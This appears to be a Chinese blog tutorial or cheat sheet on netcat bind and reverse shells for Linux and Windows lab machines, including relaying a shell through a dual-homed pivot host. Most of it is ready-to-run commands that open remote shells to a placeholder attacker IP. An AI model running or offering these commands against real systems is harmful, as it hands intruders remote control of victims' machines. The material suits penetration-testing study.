当前位置: 首页 > article >正文

NC反弹shell

NC常见参数:

-c 指定连接后要执行的shell命令

-e 指定连接后要执行的文件名

-l 监听模式

-p 设置本地使用的通信端口

-u 使用UDP传输协议,默认是TCP

-v 显示命令执行过程,使用-vv显示更详细信息


NC——正向Shell

Linux

靶机:

nc -lvp 8888 -e /bin/bash

攻击机:

nc 靶机ip 8888

攻击机连接靶机ip 端口


Windows

靶机:

nc.exe -lvp 8888 -e cmd.exe

攻击机:

nc 靶机ip 8888


NC——反向Shell

Linux

攻击机:攻击机开启监听

nc -lvp 8888

靶机:

nc 攻击机ip 8888 -e /bin/bash

Windows

攻击机:

nc -lvp 80

靶机:

nc 攻击机ip 80 -e cmd.exe


NC——通过跳板机反弹Shell

Linux

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe

攻击机:(kali02)

nc -lvp 8888

边界机:(kali 双网卡)

nc -nv 攻击机ip 8888 -c "nc 靶机ip 6666"

Windows

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe

攻击机:(win702)

nc.exe -lvp 8888

边界机:(win701 双网卡)

nc.exe -nv 攻击机ip 8888 -e "nc.exe 靶机ip 6666"

然后在攻击机中执行相关命令


http://www.kler.cn/news/309204.html

相关文章:

  • 微服务中间件之Nacos
  • Android 系统开发人员的权限说明文档
  • 解锁全球机遇:澳大利亚服务器租用市场的独特魅力
  • [C#学习笔记]Newtonsoft.Json
  • 中秋节特别游戏:给玉兔投喂月饼
  • MinIO - macOS上配置、Python调用
  • Delphi Web和Web服务开发目前有哪些选择
  • ASP.NET Core 中的 CRUD 操作
  • 游戏录屏不清楚怎么办?这些录屏技巧让画质飙升!
  • 标准的高防服务器是什么样的呢?
  • VSCode扩展连接虚拟机MySQL数据库
  • 【JavaScript】数据结构之堆
  • Python 数学建模——ARMA 时间序列分析
  • Unite Shanghai 2024 技术专场 | Unity 6及未来规划:Unity引擎和服务路线图
  • docker_持久化存储
  • 如何在Linux云服务器上解决网站截图问题
  • 【PyQt5】QWidget子类所有子类
  • 佰朔资本:股票中什么叫龙头?怎么找龙头股?
  • linux-系统管理与监控-设备管理
  • Linux 常用指令
  • 数据结构-链式二叉树-四种遍历
  • unity关于UI隐藏时性能问题
  • 解决Tez报错问题
  • 堆的概念与实现
  • 【QT】使用QOpenGLWidget后,窗口全屏之后右键菜单出不来的问题
  • java多线程模拟多个售票员从同一个票池售票
  • c++面试-语法糖(一)
  • 54. 二叉搜索树的第 k 大节点
  • 09年408考研真题-数据结构
  • MATLAB|基于多时段动态电价的电动汽车有序充电策略优化